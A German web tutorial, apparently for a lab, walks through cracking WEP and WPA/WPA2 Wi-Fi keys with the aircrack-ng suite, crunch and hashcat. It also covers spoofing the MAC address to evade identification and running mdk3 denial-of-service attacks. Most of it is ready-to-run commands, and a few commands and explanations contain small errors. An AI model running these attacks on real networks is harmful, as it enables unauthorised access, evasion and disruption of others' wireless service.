{% include 'static/header.html' %}
<h1>WEP</h1>
WEP (Wired Equivalent Privacy) ist ein Standard für die Verschlüsselung und Authentifizierung von WLANs aus dem Jahr 1999. Ziel war es, Funknetzwerke genauso sicher wie kabelgebundene Netzwerke zu machen. Um dieses Ziel zu erreichen bietet WEP Mechanismen für die Authentifizierung, Verschlüsselung und Integritätsprüfung. </br></br>

WEP enthält grundlegende Design-Schwächen und gilt seit 2001 als geknackt. </br></br>

Für die Authentifizierung der Clients am Access Point sieht WEP zwei Varianten vor, die Open System Authentication oder die Shared Key Authentication. Die Open System Authentication ist die Standard-Authentifizierung bei WEP. Diese schaltet für ein WLAN alle Clients frei, eine Authentifizierung findet praktisch nicht statt. Die Shared Key Authentication setzt das WLAN-Passwort zur Authentifizierung der WLAN-Clients ein. Die Authentifizierung erfolgt per Challange-Response-Verfahren. </br></br>

Das bei WEP verwendete Verschlüsselungsverfahren en ist RC4, eine Datenstromchiffrierung.  Ein mit WEP verschlüsseltes Datenpaket besteht aus dem geheimen WEP-Schlüssel mit 40 oder 104 Bit Länge (WEP64 / WEP128), einer 32 Bit Prüfsumme der unverschlüsselten Daten (Integrity Check Value, ICV) und einem 24 Bit langem Initialisierungsvektor,  den WEP-Schlüssel zum Gesamtschlüssel auf 64 Bit oder 128 Bit verlängert und einmal pro Datenpaket inkrementiert (-1) wird. 

<h2>Cracking des WEP Keys</h2>

Zuerst muss geprüft werden, ob der eingesteckte USB WLAN-Adapter erkannt wird und
einsatzbereit ist. Dazu das Terminal in Kali Linux öffnen und folgenden Befehl
eingeben:

<p><em>iwconfig</em></p>

Nun sollte der Adapter als Interface, meist wlan0 oder wlan1, angezeigt werden.
Bei den nun folgenden Befehlen wurde der WLAN-Adapter duch den Interface-Namen wlanX gekennzeichnet, welche durch den tatsächlichen Interface-Namen (z.B. wlan0) ersetzt werden muss.<br/>

Zusätzlich benötigen wir noch die MAC-Adresse des WLAN-Adapters, diese erhalten wir über den Befehl

<p><em>ifconfig</em></p>

Auf dem Betriebssystem laufen eventuell um Zugriff auf den WLAN-Adapter konkurierende Prozesse, welche durch das untenstehende Kommando beendet werden.

<p><em>airmon-ng check kill</em></p>

Durch die Eingabe von

<p><em>airodump-ng wlanX</em></p>

können wir nun nach in der Umgebung verfügbaren Netzwerken im 2.4 GHz-Band suchen, für die Suche im 5 GHz-Band muss der Parameter "-band abg" angehängt werden. </br>
Die Suche kann mit strg+c abgebrochen werden, wenn das anzugreifende Netz angezeigt wird.
</br>

Das Ergebnis sieht in etwa so aus:</br></br>

 66:E3:27:4F:DF:E7  -22        7        5    0  11  54e. WEP  WEP         HackMe_WEP_Open

</br></br>

Wir benötigen im weiteren die BSSID (MAC-Adresse des Access Points), den Netzwerknamen (SSID) und den Funkkanal, welche sich aus der durch den letzten Befehl generierten Tabelle entnehmen lässt.</br>

Durch den Befehl

<p><em>airodump-ng -c FUNKKANAL -w NETZWERKNAME --bssid BSSID wlanX</em></p>

beginnen wir damit, den Datenverkehr des anzugreifenden Netzwerks in einer Datei aufzuzeichen. </br>

Nun starten wir ein weiteres Terminal für den nachfolgenden Befehl:

<p><em>aireplay-ng -9 -e SSID -a BSSID wlan0</em></p>

Durch den obenstehenden Befehl testen wir, ob der Ziel-Access Point anfällig für Injection ist. Durch diese Technik können wir zusätzlichen Datenverkehr auf dem Access Point generieren, um die Zeit für einen Angriff zu verkürzen.</br>


Anschließend authentifizieren wir uns am Access Point. Jede Sekunde senden wir ein keepalive-Paket, die Authentifizierung erneuern wir alle 6 Sekunden.
<p><em>aireplay-ng -1 6 -o 1 -q 1 -e NETZWERKNAME -a BSSID -h ADAPTER-MAC wlanX</em></p>

In einem neuen Terminal lauschen wir auf ARP-Reqests aus dem Ziel-Netzwerk und senden diese wieder ins Netzwerk. Durch die Antwort des Acces Points erhalten wir zusätzliche Datenpakete.
<p><em>aireplay-ng -3 -b BSSID -h ADAPTER-MAC wlanX</em></p>

Nun müssen wir warten, bis die Anzahl der Datenpakete mindestens 40000 erreicht. </br>

Für das nachfolgende Kommando benötigen wir nochmal ein neues Terminal.<br>

<p><em>aircrack-ng -b BSSID NETZWERKNAME-01.cap</em></p>

Durch diesen Befehl öffnen wir die Datei mit dem aufgezeichneten Datenverkehr und berechnen daraus den Schlüssel für das WLAN.</br></br>

Nach einem erfolgreichen Angriff können wir die in den anderen Terminals laufenden Prozesse durch strg + c beenden.</br>

<h3>WPA/WPA2</h3>
WPA bzw. WPA2 (WiFi Protected Access) ist eine Kombination aus Authentifizierung und
Verschlüsselung, um ein WLAN sicher zu betreiben. Die Authentifizierung erfolgt in der
Regel mit einem Passwort, um den Zugriff durch unberechtigte Personen zu verhindern.
Möchte ein Angreifer nun in das Netzwerk eindringen, muss er dieses Passwort herausfinden.
Grundsätzlich gibt es beim Hacken keine Unterschiede zwischen WPA- und WPA2-gesicherte
WLANs. Die Authentifizierungsmethode ist im Prinzip identisch. Der Unterschied liegt im
Verschlüsselungsverfahren, welche für die typischen Hacking-Methoden auf WPA-gesicherte
WLANs nicht relevant ist.
Grund dafür ist, dass WPA2 derzeitig noch als nicht zu knackendes Verschlüsselungsverfahren
gilt und daher ein Angriff auf die Verschlüsselung vergebene Mühe wäre.
Der typische Angriff gegen ein WPA-/WPA2-gesichertes WLAN läuft über reines Bruteforcing
oder einer sogenannten Wörterbuch-Attacke (engl. dictionary-attack). Bei Ersterem
werden einfach alle Kombinationen bestehend aus Buchstaben, Ziffern und Sonderzeichen,
oder nur einem Ausschnitt davon, bis zur gewünschten Länge getestet. Je nach Länge und
Komplexität des Passworts kann sich dieser Vorgang über viele Stunden, bis zu Tagen
und sogar mehreren Jahren hinziehen. Häufig wird bei einer Bruteforce-Attacke zuvor eine
Wordlist, wie bei einem Dictionary-Angriff, mit allen zu testenden Kombinationen erstellt.
Bei einem Wörterbuch-Angriff wird somit durch die Passwortkandidaten in einer riesigen
Wordlist iteriert und mit dem herauszufindenden Passwort abgeglichen. Stimmen beide
überein, wurde das Passwort gefunden. Diese Wörterlisten können entweder selber generiert
werden oder sind auch im Internet zu finden. Wie wir später noch sehen werden, gibt es
auch hybride Ansätze, die beide Angriffsarten verknüpfen.
Ein WPA-Handshake findet zwischen Access Point und WLAN-Client statt, wenn der WLANClient
sich mit dem WLAN verbinden will. Dieser WPA-Handshake muss aufgezeichnet
werden. Anschließend wird bei einem Wörterbuch-Angriff mit Hilfe der Wordlist das WLAN Passwort
erraten. Ein erfolgreicher Angriff steht und fällt mit einer guten Wordlist, in der
das WLAN-Passwort enthalten sein muss. Darin besteht die eigentliche Schwierigkeit bei
einem WPA/WPA2-WLAN-Hack.

<h1>Cracking des WPA Keys</h1>
<p>1. Check des WLAN Adapter</p>
Zuerst muss geprüft werden, ob der eingesteckte USB WLAN-Adapter erkannt wird und
somit einsatzbereit ist. Dazu das Terminal öffnen in Kali Linux öffnen und folgenden Befehl
eingeben.
<p><em>iwconfig</em></p><br/>
Der Adapter sollte als Interface, meist WLAN0 oder WLAN1, angezeigt werden
Im Folgenden muss bei allen Befehlen die Interface Bezeichnung mit der hier angezeigten
ersetzt werden, da sie sich von Rechner zu Rechner unterscheiden kann.<br />
<p>2. MAC-Spoofing </p>
Im Sinne von Wireless Security sollte man sich immer im Klaren sein, dass ein Angreifer
immer in der Lage ist seine MAC-Adresse zu verändern. Dieser Vorgang wird auch Spoofing
genannt.
Die MAC-Adresse ist eine herstellerspezifische Kennung, die fest einem Netzwerkgerät zugeordnet
ist. Jede Adresse ist eindeutig. Findet man die MAC-Adresse eines Angreifers heraus,
kann mit Hilfe dieser Identifikationskennung festgestellt werden, welchen Typ von Antenne er verwendet.
Diese Erkenntnis kann helfen einen Angreifer zu identifizieren. Verwendet ein
Angreifer nun eine gefälschte MAC-Adresse können keine Rückschlüsse auf seine Identität
gezogen werden, da überall nur seine Fake-Adresse angezeigt wird.
Zuerst muss dafür das WLAN Interface deaktiviert werden. Danach kann mit dem Kommando
macchanger die Adresse geändert werden.
<p><em>ifconfig wlanX down<br/>
macchanger -r wlanX</em></p>
X = NUM für das interface<br/></br>
Beim Bestätigen des Befehls mit Enter, wird die eigene MAC-Adresse in eine zufällige
generierte MAC-Adresse geändert und auf der Konsole angezeigt. Anschließend kann das
Interface mit folgendem Befehl wieder aktiv gesetzt werden.
<p><em>ifconfig wlanX up</em></p>
X = NUM für das interface<br/><br/>
Mit dem Befehl
<p><em>ifconfig wlanX</em></p>
X = NUM für das interface<br/><br/>
kann überprüft werden, ob die gespoofte MAC-Adresse auch aktiv ist.
<p>3. Das Interface in den Monitor Mode versetzen</p>
Damit mit dem WLAN Adapter Pakete aufgezeichnet werden können, muss sich der Adapter
im Monitoring Mode, oder auch Packet Injection Mode genannt, befinden. Dies wird mit
folgendem Befehl erreicht.
<p><em>airmon-ng start wlanX</em></p>
X = your number from iwconfig<br/></br>
Mit dem Befehl
<p><em>airmon-ng check kill</em></p>
werden alle andere Prozesse beendet, die auch auf den Netzwerkadapter zugreifen können.
So können Konflikte beim Zugriff auf die Ressource vermieden werden.
<h1>4. Aufzeichnen der WLAN Pakete mit airodump</h1>
Im nächsten Schritt werden die WLAN Pakete aus der Umgebung aufgezeichnet. Damit
möchte man einen Handshake zwischen dem zu hackenden Access Point und einem Client
aufzeichnen. Anhand dessen kann anschließend das Passwort herausgefunden werden.
Mit dem folgenden Befehl können wir in den Aufzeichnungsmodus umschalten.
<p><em>airodump-ng -b a wlanXmon</em></p>
X = NUM für das interface</br>
-b a = Scan im 5GHz Band</br></br>
Falls wir im im 5GHz Bereich scannen möchten muss der Parameter -b a mitgegeben werden.
Falls nicht, kann der Parameter einfach weggelassen werden.
Sollten keine Daten aufgezeichnet werden, dann den Adapter mehrmals aus- und wieder
einstecken. Nach einem Reconnect muss der Adapter natürlich wieder in den Monitoring
Modus versetzt werden.
Hat alles soweit geklappt, sollten alle erreichbaren SSIDS mit ihren jeweiligen Sendern
angezeigt werden.
Als nächstes sollte die MAC-Adresse und der verwendete Kanal des zu hackenden APs notiert.
Anschließend kann durch einen neuen airodump-ng Durchlauf mit der MAC und dem Kanal
als Parameter (nähere Infos unter man airodump − ng abrufbar) der Scan eingeschränkt
werden. Zusätzlich kann auch der Name der Ausgabedatei festgelegt werden. Der Befehl
sieht dann in etwa wie nachfolgend aus.
<p><em>airodump-ng -c Kanal -b a --bssid MAC-AP -showack -w Filename wlanXmon</em></p>
X = NUM für das interface</br>
Kanal = der Kanal auf dem gelauscht werden soll</br>
MAC-AP = die MAC-Adresse des Access Points</br>
Filename = in die zu schreibende Datei</br></br>
Verbindet sich nun ein Client auf den AP, so kann der 4-way-handshake mitgelesen werden,
was auch in der Konsole, in der rechten oberen Ecke, angezeigt wird. Hat dies funktioniert,
ist der erste Schritt für das Hacken des Passworts abgeschlossen.
<h1>5. Cracken des Passworts</h1>
Ab hier werden verschieden Tools und Angriffsarten für das Cracken des Keys vorgestellt.
Dictionary Attack mit aircrack
Dazu wird ein Dictionary File mit allen Passwörtern benötigt, die auf übereinstimmung
mit dem PSK gecheckt werden sollen. Auf dem Image sollt bereits eine Dictionary Datei im
Home Verzeichnis vorhanden sein.
Mit folgendem Befehl kann der Dictionary-Angriff gestartet werden.
<p><em>aircrack-ng -w dict.f ile -b MAC-AP File.cap</em></p>
dict.file = Pfad zu dem Dictionary<br/>
MAC-AP = Die MAC-Adresse des APs<br/>
File.cap = Pfad zu dem cap file<br/><br/>
<h2>Brutefore Angriff mit aircrack und crunch</h2>
<p><em>crunch 8 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
| aircrack-ng --bssid 00 : 11 : 22 : 33 : 44 : 55 -w- hack-wif i-01.cap</em></p>
8 12 = die zu testende Passwortlängen, hier von Länge 8 bis 12<br/>
abcde.. = die zu testenden Zeichen<br/>
<h2>Attacken mit hashcat</h2>
Bei hashcat handelt es sich wohl um den derzeit schnellsten Passwortcracker auf dem Markt.
Wir verwenden es als Alternative zu crunch.
Convert the .cap file in a hccap file
<p><em>aircrack-ng Filename.cap -J newFilename</em></p>
Filename.cap = Pfad bzw. Name des alten .cap files<br/>
Pfad bzw. Name des neuen .hccap file<br/><br/>
Mit <em>hashcat -help</em> kann eine Hilfeseite aufgerufen werden in welcher der Befehl, die Parameter
und die Verwendung genauer erläutert werden. Falls Probleme auftreten oder detailliertere
Einstellungen vorgenommen werden sollen, kann die Hilfeseite die erste Anlaufstelle sein.
<h2>Dictionary Attack mit hashcat</h2>
<p><em>hashcat -m 2500 capture.hccap dict.txt</em></p>
-m 2500 = Anweisung, dass ein WPA/WPA2 Key gecrackt werden soll<br/>
caputre.cap = Pfad bzw. Name des hccap file<br/>
dict.txt = Pfad bzw. Name des dictionary file<br/><br/>
Anschließend nutzt hashcat das Dictionary um das Passwort zu finden. Mit Enter kann der
aktuelle Status des Vorgangs abgefragt werden.
<h2>Bruteforce Attack mit hashcat</h2>
<p><em>hashcat -m 2500 -a3 capture.hccap ?d?d?d?d?d?d?d?d (?d = 0-9)</em></p>
-m 2500 = Anweisung, dass ein WPA/WPA2 Key gecrackt werden soll<br/>
-a3 = Verwende Bruteforce caputre.cap = Pfad bzw. Name des hccap file<br/>
?d..?d = definierte Maske für zu testenden Passwortkandidaten, Anzahl entspricht ”bis zu
Länge”<br/>
Weitere Optionen:<br/>
?l = abcdefghi...yz<br/>
?u = ABCDEFGHI...YZ<br/>
?s = Sonderzeichen<br/>
?a = ?l?u?s?<br/><br/>
Bei der Bruteforce Attacke werden alle Kombinationen von Buchstaben bis zu einer bestimmten
Länge durchgetestet. Als letzter Parameter kann eine Art Maske angegeben werden, mit
welcher die Länge und die zu testenden Ziffern, Buchstaben und Zeichen festgelegt werden.
Im Beispiel werden alle bis zu neunstelligen Zahlenkombinationen von hashcat durchprobiert.
<h2>rule-based Attack mit hashcat</h2>
<p><em>hashcat -m 2500 -r /usr/share/hashcat/rules/best64.rule capture.hccap dict.txt</em></p>
-m 2500 = Anweisung, dass ein WPA/WPA2 Key gecrackt werden soll<br/>
-r Pfad zum rules file = Verwende rule-based Angriff und Pfad<br/><br/>
rule-based attacks gehören zu den komplizierteren Angriffsarten. Dabei wird ein nomaler
Dictionary-Angriff gefahren, aber mit rules erweitert. Die rules, zu deutsch Regeln, sind
wie eine Art Programmiersprache für die Generierung von Passwörtern. Es gibt Funktionen
mit denen Passwortkandidaten bearbeitet, mit anderen Wörtern verknüpft oder bestimmte
Kombinationen übersprungen werden können. Regeln zu schreiben kann sehr aufwendig sein
und erfordert viel Wissen über Passwörter. Daher kann für die ersten Versuche auch die
best64.rule Regel verwendet werden, die standardmäßig bei hashcat dabei ist.

<h2>DoS</h2>

Für den Denail of Service-Angriff verwenden wir das Tool MDK3 (Murder Death Kill 3), welches speziell für WLAN-Netzwerke entwickelt wurde. 
</br>
Zuerst müssen die um den WLAN-Adapter konkurierenden Prozesse über das Kommando 
<p><em>airmon-ng check kill</em></p>
beendet werden. 

Danach versetzen wir den WLAN-Adapter in den Monitoring-Modus. Dies geschieht über das Kommando: 
<p><em>airmon-ng start wlanX</em></p>
Dabei gilt zu beachten das wlanX durch den eigentlichen Namen des WLAN-Adapters ersetzt werden muss (z.B. wlan1). 
Der WLAN-Adapter erhält dabei einen neuen Namen, wlanXmon. Das X kann sich auch hier wieder von System zu System unterscheiden. 
</br></br>
Anschließend suchen wir uns den Ziel-Access Point aus. Dies geschieht über den Befehl: 
<p><em>airodump-ng wlanXmon --band abg</em></p>

Aus der von diesem Werkzeug generierten Liste notieren wir die MAC-Adresse des Ziel-Access Points (BSSID) und die Art der Verschlüsselung. Diese Informationen werden im weiteren Verlauf benötigt. 
</br>
Das MDK3-Tool stellt verschiedene Methoden bereit, um einen DoS-Angriff auf dem Ziel auszuführen. 

<h3>Michael shutdown exploitation</h3>
Diese Methode nutzt einen Fehler in der TKIP-Verschlüsselung aus, um den gesamten Datenverkehr im Ziel-Netzwerk zu unterbinden. Für einen erfolgreichen Angriff muss das WLAN mit TKIP verschlüsselt worden sein.<br/>
<p><em>mdk3 wlanXmon m -t BSSID -j</em></p>
Durch den Parameter -j wird MDK3 angewiesen, eine Schwachstelle in der QoS-Implementierung der TKIP-Verschlüsselung auszunutzen. Dadurch werden nur ein paar Datenpakete benötigt, um den Datenverkehr zu blockieren.
Der Parameter wlanXmon muss wieder durch den eigentlichen Namen des WLAN-Adapters ersetzt werden. 

<h3>Beacon Flood Mode</h3>
Bei dieser Methode werden Beacon-Frames ausgesendet, um den Clients gefälschte Access Points vorzugaukeln. Dies kann zu Abstürzen der Netzwerkscanner oder Treiber der WLAN-Adapter führen. 
<p><em>mdk3 wlanXmon b -c 1</em></p>
Der Parameter wlanXmon muss wieder durch den eigentlichen Namen des WLAN-Adapters ersetzt werden.
das -c legt den Funkkanal fest, auf dem die Access Points erstellt werden sollen. 

<h3>Authentication DoS mode</h3>
Bei dieser Methode werden vom Angreifer Authentication-Frames an den durch die BSSID spezifizerten Access Point geschickt. Zu viele Clients bringen den Access Point möglicherweise zum Absturz. 
<p><em>mdk3 wlanXmon a -a BSSID</em></p>

{% include 'static/footer.html' %}



